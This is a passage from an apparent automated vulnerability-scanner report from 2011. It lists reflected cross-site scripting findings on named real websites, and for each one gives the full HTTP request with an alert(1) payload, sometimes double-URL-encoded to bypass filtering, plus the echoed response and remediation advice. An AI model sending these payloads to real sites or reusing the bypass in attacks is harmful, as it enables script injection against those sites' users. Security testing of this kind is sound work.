<input type="hidden" name="404;http://www.wileyrein.com:80/rss8e1f4"><script>alert(1)</script>0a2d2f96202/practices/White_Collar_Defense/rss.xml" value="">
...[SNIP]...

4.296. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/White_Collar_Defense/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e4a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edceb9945ee4 was submitted in the REST URL parameter 2. This input was echoed as 68e4a"><script>alert(1)</script>dceb9945ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices68e4a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edceb9945ee4/White_Collar_Defense/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices68e4a"><script>alert(1)</script>dceb9945ee4/White_Collar_Defense/rss.xml" value="">
...[SNIP]...

4.297. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/White_Collar_Defense/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b35%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3123ddbb2f4 was submitted in the REST URL parameter 3. This input was echoed as 74b35"><script>alert(1)</script>3123ddbb2f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/White_Collar_Defense74b35%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3123ddbb2f4/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/White_Collar_Defense74b35"><script>alert(1)</script>3123ddbb2f4/rss.xml" value="">
...[SNIP]...

4.298. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/White_Collar_Defense/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e069fcdb3970 was submitted in the REST URL parameter 4. This input was echoed as b3f91"><script>alert(1)</script>069fcdb3970 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/White_Collar_Defense/rss.xmlb3f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e069fcdb3970 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/White_Collar_Defense/rss.xmlb3f91"><script>alert(1)</script>069fcdb3970" value="">
...[SNIP]...

4.299. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/publications/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85268%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8395fd2c6ad was submitted in the REST URL parameter 1. This input was echoed as 85268"><script>alert(1)</script>8395fd2c6ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss85268%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8395fd2c6ad/publications/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss85268"><script>alert(1)</script>8395fd2c6ad/publications/rss.xml" value="">
...[SNIP]...

4.300. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/publications/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 438f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ac3b841518 was submitted in the REST URL parameter 2. This input was echoed as 438f3"><script>alert(1)</script>2ac3b841518 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/publications438f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ac3b841518/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/publications438f3"><script>alert(1)</script>2ac3b841518/rss.xml" value="">
...[SNIP]...

4.301. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/publications/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7207%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5a1738ffeb4 was submitted in the REST URL parameter 3. This input was echoed as d7207"><script>alert(1)</script>5a1738ffeb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/publications/rss.xmld7207%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5a1738ffeb4 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/publications/rss.xmld7207"><script>alert(1)</script>5a1738ffeb4" value="">
...[SNIP]...

4.302. http://www.wileyrein.com/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53325%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cfc2555b00 was submitted in the REST URL parameter 1. This input was echoed as 53325"><script>alert(1)</script>5cfc2555b00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /x2253325%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cfc2555b00 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/x2253325"><script>alert(1)</script>5cfc2555b00" value="">
...[SNIP]...

4.303. http://www.wileyrein.com/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b894"><script>alert(1)</script>8dd0074b00e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /x22?4b894"><script>alert(1)</script>8dd0074b00e=1 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/x22?4b894"><script>alert(1)</script>8dd0074b00e" value="1">
...[SNIP]...

4.304. http://www.yellowpages.com/Washington-DC/Attorneys [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /Washington-DC/Attorneys

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 74302<img%20src%3da%20onerror%3dalert(1)>9c7a66be0e0 was submitted in the REST URL parameter 1. This input was echoed as 74302<img src=a onerror=alert(1)>9c7a66be0e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Washington-DC74302<img%20src%3da%20onerror%3dalert(1)>9c7a66be0e0/Attorneys HTTP/1.1
Host: www.yellowpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:15:48 GMT
Status: 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
ETag: "fe49e31c6916f552cdd08e87622213a0"
Cache-Control: no-cache
Set-Cookie: search_terms=Attorneys; path=/
Set-Cookie: parity_analytics=---+%0A%3Avisit_id%3A+nfa4wzodvfw2y17mv7r0lysb8wmr3%0A%3Avisit_start_time%3A+2011-01-19+15%3A15%3A48.284572+%2B00%3A00%0A%3Alast_page_load%3A+2011-01-19+15%3A15%3A48.284574+%2B00%3A00%0A; path=/; expires=Sat, 19-Jan-2036 15:15:48 GMT
Set-Cookie: vrid=eb20d5b0-060c-012e-ac55-001b782eaaae; domain=.yellowpages.com; path=/; expires=Tue, 19-Jan-2016 15:15:48 GMT
Set-Cookie: _parity_session=BAh7BjoPc2Vzc2lvbl9pZCIlOTc0MjkxMmFkNzM3ODI1MTUzNTI4ZDEzYzczYzlkZjQ%3D--9c4ba5554adcb3c70acdbf419598e94fbcf23da5; path=/; HttpOnly
Set-Cookie: b=10010; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
X-Urid: d-eae90630-060c-012e-9ab7-001b782eaaae
Expires: Wed, 19 Jan 2011 15:15:47 GMT
Connection: close
Content-Length: 227096

<!DOCTYPE html>
<html>
<head>

<title>No Location Found - YP.com</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="" name="description" />
<meta content="" n
...[SNIP]...
<a href="http://www.yellowpages.com/dallas-tx" class="all-categories">See All Categories for Washington DC74302<img src=a onerror=alert(1)>9c7a66be0e0</a>
...[SNIP]...

4.305. http://gc.blog.br/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gc.blog.br
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56576"><script>alert(1)</script>eda13df7848 was submitted in the Referer HTTP header. This input was echoed as 56576\"><script>alert(1)</script>eda13df7848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: gc.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=56576"><script>alert(1)</script>eda13df7848

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:08:53 GMT
Server: Apache/2.2.10 (CentOS)
X-Pingback: http://gc.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 121965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="http://duodra.co/post/seu-ambiente-de-trabalho-em-7-itens/" onclick="urchinTracker('/outgoing/duodra.co/post/seu-ambiente-de-trabalho-em-7-itens/?referer=http://www.google.com/search?hl=en&q=56576\"><script>alert(1)</script>eda13df7848');">
...[SNIP]...

4.306. http://gc.blog.br/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gc.blog.br
Path:   /

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f8d51--><script>alert(1)</script>e2c96b26918 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: gc.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f8d51--><script>alert(1)</script>e2c96b26918

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:02 GMT
Server: Apache/2.2.10 (CentOS)
X-Pingback: http://gc.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 121965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="http://www.devinrio.com.br" onclick="urchinTracker('/outgoing/www.devinrio.com.br?referer=http://www.google.com/search?hl=en&q=f8d51--><script>alert(1)</script>e2c96b26918');">
...[SNIP]...

4.307. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://medienfreunde.com
Path:   /lab/innerfade/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3aa4"><script>alert(1)</script>5b3e569b7ac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: f3aa4"><script>alert(1)</script>5b3e569b7ac

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<!-- saved from url=(0013)about:internet -->
   <hea
...[SNIP]...
<iframe src="http://pingomatic.com/ping/?title=Gestaltung+von+Flyern&blogurl=f3aa4"><script>alert(1)</script>5b3e569b7ac&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo
...[SNIP]...

4.308. http://web2.domainmall.com/domainserve/domainView [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1fbc"-alert(1)-"4da742fdffd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domainserve/domainView HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e1fbc"-alert(1)-"4da742fdffd

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:32 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=368644ed6f38613c5c1b9e12584cc21249145986; path=/; expires=Wed, 19-Jan-2011 19:15:32 GMT
Content-Length: 44076
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
rl+"' onclick='ajax_click(\""+ads[i].visible_url+"\",\"domainmall.com\",\"557127472\",\"auto insurance\", \""+ads[i].line1+"\",\""+ads[i].line2+"\",\""+(i+1)+"\",\"http://www.google.com/search?hl=en&q=e1fbc"-alert(1)-"4da742fdffd\",\"Test_B_5\",\"0\")'");
ad_html = ad_html.replace("<-ad.LINE1->
...[SNIP]...

4.309. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ff5f"><script>alert(1)</script>3d126670e87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5ff5f"><script>alert(1)</script>3d126670e87

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:26:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=5ff5f"><script>alert(1)</script>3d126670e87" />
...[SNIP]...

4.310. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload aef4b<script>alert(1)</script>c275ed0f500 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aef4b<script>alert(1)</script>c275ed0f500

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:26:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<h4>aef4b<script>alert(1)</script>c275ed0f500 - Google search</h4>
...[SNIP]...

4.311. http://www.arnoldporter.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /

Issue detail

